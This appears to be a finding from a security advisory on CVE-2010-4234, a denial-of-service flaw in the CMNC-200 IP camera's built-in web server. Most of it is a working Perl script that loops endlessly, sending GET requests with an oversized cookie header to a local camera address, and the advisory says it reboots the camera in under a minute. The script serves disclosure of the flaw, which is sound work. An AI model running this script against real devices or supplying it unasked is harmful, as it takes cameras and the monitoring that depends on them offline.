46 lines
No EOL
1.5 KiB
Text
46 lines
No EOL
1.5 KiB
Text
Finding 5: Camera Denial of Service
|
|
CVE: CVE-2010-4234
|
|
|
|
The CMNC-200 IP Camera has a built-in web server that
|
|
is vulnerable to denial of service attacks. Sending multiple
|
|
requests in parallel to the web server may cause the camera
|
|
to reboot.
|
|
|
|
Requests with long cookie header makes the IP camera reboot a few
|
|
seconds faster, however the same can be accomplished with requests
|
|
of any size.
|
|
|
|
The example code below is able to reboot the IP cameras in
|
|
less than a minute in a local network.
|
|
|
|
#!/usr/bin/perl
|
|
|
|
use LWP::UserAgent;
|
|
|
|
while (1 == 1){
|
|
|
|
$ua = new LWP::UserAgent;
|
|
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US;
|
|
rv:1.8.1.6)");
|
|
|
|
$req = HTTP::Request->new(GET => 'http://192.168.10.100');
|
|
$req->header(Accept =>
|
|
"text/xml,application/xml,application/xhtml+xml,text/html
|
|
;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5");
|
|
$req->header("Keep-Alive" => 0);
|
|
$req->header(Connection => "close");
|
|
$req->header("If-Modified-Since" => "Mon, 12 Oct 2009
|
|
02:06:34 GMT");
|
|
$req->header(Cookie =>
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
|
|
my $res = $ua->request($req);
|
|
|
|
} |